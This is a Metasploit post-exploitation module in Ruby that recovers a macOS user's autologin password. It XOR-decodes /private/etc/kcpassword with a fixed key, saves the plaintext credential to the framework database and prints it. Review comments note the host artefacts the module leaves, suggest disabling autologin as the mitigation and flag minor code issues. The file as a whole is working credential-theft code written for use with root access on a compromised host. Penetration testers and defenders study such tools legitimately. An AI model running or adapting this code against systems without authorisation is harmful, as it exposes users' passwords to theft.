##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module: recovers the macOS autologin password from the kcpassword file.
#
# Host-side artefacts this module produces (useful for detection): a root
# `defaults read` of /Library/Preferences/com.apple.loginwindow, a read of the
# file named by KCPASSWORD_PATH, and a credential written to the framework
# database. The Description below ties the file to the autologin setting, so
# turning autologin off is the natural mitigation for the data it targets.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::OSX::Priv

  # extract/verify by XORing your kcpassword with your password
  # Fixed 11-byte key. In #run the file bytes are cut into chunks of this
  # length and each byte is XORed with the key byte at the same offset.
  # NOTE(review): the array is not frozen; it is only ever read here, but a
  # `.freeze` would make that explicit.
  AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F]

  # Module metadata and options.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OSX Gather Autologin Password as Root',
        'Description' => %q{
          This module will steal the plaintext password of any user on the machine
          with autologin enabled. Root access is required.

          When a user has autologin enabled (System Preferences -> Accounts), OSX
          stores their password with an XOR encoding in /private/etc/kcpassword.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'Platform' => [ 'osx' ],
        'References' => [
          ['URL', 'https://web.archive.org/web/20180408062145/http://www.brock-family.org/gavin/perl/kcpassword.html'],
        ],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # Advanced option consumed by #kcpassword_path; defaults to the
    # location named in the Description.
    register_advanced_options([
      OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword'])
    ])
  end

  # Entry point. Requires root (is_root?), looks up the autologin account with
  # `defaults read`, decodes the kcpassword bytes and stores the result as a
  # credential. Aborts via fail_with when not root or when no autologin user
  # is configured.
  def run
    # ensure the user is root (or can read the kcpassword)
    unless is_root?
      fail_with(Failure::NoAccess, 'Root privileges are required to read kcpassword file')
    end

    # read the autologin account from prefs plist
    # stderr is discarded (2> /dev/null), so only stdout reaches autouser.
    # NOTE(review): the trailing `username` token is not an obvious
    # `defaults read <domain> <key>` argument — confirm it is intentional.
    read_cmd = 'defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username'
    autouser = cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'")

    # An empty/blank result is treated as "autologin not configured".
    if autouser.present?
      print_status "User #{autouser} has autologin enabled, decoding password..."
    else
      fail_with(Failure::NotVulnerable, 'No users on this machine have autologin enabled')
    end

    # kcpass contains the XOR'd bytes
    # NOTE(review): if read_file returns nil for an absent or unreadable file,
    # `.bytes` below raises NoMethodError instead of a clean fail_with —
    # confirm read_file's contract before relying on this path.
    kcpass = read_file(kcpassword_path)
    key = AUTOLOGIN_XOR_KEY

    # decoding routine, slices into 11 byte chunks and XOR's each chunk
    # A final short chunk uses only the leading key bytes (idx < key.length).
    # The joined string is then cut at the first NUL. Note that `.` does not
    # match a newline and `$` is end-of-line, so if a newline follows the
    # first NUL, anything after that newline survives the sub; `/\x00.*/m`
    # would truncate unconditionally.
    decoded = kcpass.bytes.to_a.each_slice(key.length).map do |kc|
      kc.each_with_index.map { |byte, idx| byte ^ key[idx] }.map(&:chr).join
    end.join.sub(/\x00.*$/, '')

    # save in the database
    # Don't record a Login, since we don't know what service to tie it to
    credential_data = {
      workspace_id: myworkspace_id,
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      username: autouser,
      private_data: decoded,
      private_type: :password
    }

    create_credential(credential_data)
    # The secret is echoed to the console here as well as stored above;
    # console logs therefore also contain it.
    print_good "Decoded autologin password: #{autouser}:#{decoded}"
  end

  private

  # @return [String] kcpassword location taken from the KCPASSWORD_PATH option
  def kcpassword_path
    datastore['KCPASSWORD_PATH']
  end

  # Memoized `whoami` output. Not referenced by #run in this file.
  def user
    @user ||= cmd_exec('whoami').chomp
  end
end